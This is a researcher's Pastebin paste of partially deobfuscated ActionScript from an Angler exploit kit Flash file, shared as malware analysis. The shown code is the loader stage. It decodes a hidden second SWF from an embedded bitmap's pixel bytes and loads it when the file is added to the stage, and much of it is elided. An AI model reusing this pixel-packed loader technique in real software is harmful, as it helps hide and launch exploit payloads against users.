Neonprimetime

Partially Deofuscated Angler EK flash exploit swf file

Jun 2nd, 2016
144
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Partially Deofuscated Angler EK flash exploit swf file
  2. *******
  3. Original obfuscated code: http://pastebin.com/nS0pGa1e
  4. *******
  5. *******
  6. package {
  7.     import flash.display.*;
  8.     import flash.system.*;
  9.     import flash.utils.*;
  10.  
  11.     public class Document extends MovieClip {
  12.         public function Document(){
  13.             super();
  14.             if (this["stage"]){
  15.                 this.functionStartExploit();
  16.             } else {
  17.                 this["addEventListener"]("addedToStage", this.functionStartExploit);
  18.             };
  19.         }
  20.         public function functionStartExploit():void{
  21.             this["removeEventListener"]("addedToStage", this.functionStartExploit);
  22.             var _localEmbeddedSWF:* = new flash.display.Loader();
  23.             _localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
  24.             this["addChild"](_localEmbeddedSWF);
  25.         }
  26.        
  27.         ...
  28.        
  29.         private function functionEmbeddedSWFFromBitmap(){
  30.             var _localMaliciousByteArray:* = new flash.utils.ByteArray();
  31.             var _localBitmap:* = new BitmapAsset()["bitmapData"];
  32.             ...
  33.             while (_localCounter2 < _localBitmap["width"]) {
  34.                 while (_localCounterNested < _localBitmap["height"]) {
  35.                     _localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
  36.                     ...
  37.                     _localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
  38.                     _localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
  39.                     _localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
  40.                     ...
  41.                     _localCounterNested++;
  42.                 };
  43.                 ...
  44.                 _localCounter2++;
  45.             };
  46.             ...
  47.             _localMaliciousByteArray["position"] = 0;
  48.             return (_localMaliciousByteArray);
  49.         }
  50.  
  51.         ...
  52.     }
  53. }//package
  54.  
  55. *******
  56. *******
  57. *******
  58. More FROM @neonprimetime security
  59.  
  60. http://pastebin.com/u/Neonprimetime
  61. https://www.virustotal.com/en/USER/neonprimetime/
  62. https://twitter.com/neonprimetime
  63. https://www.reddit.com/USER/neonprimetime
RAW Paste Data Copied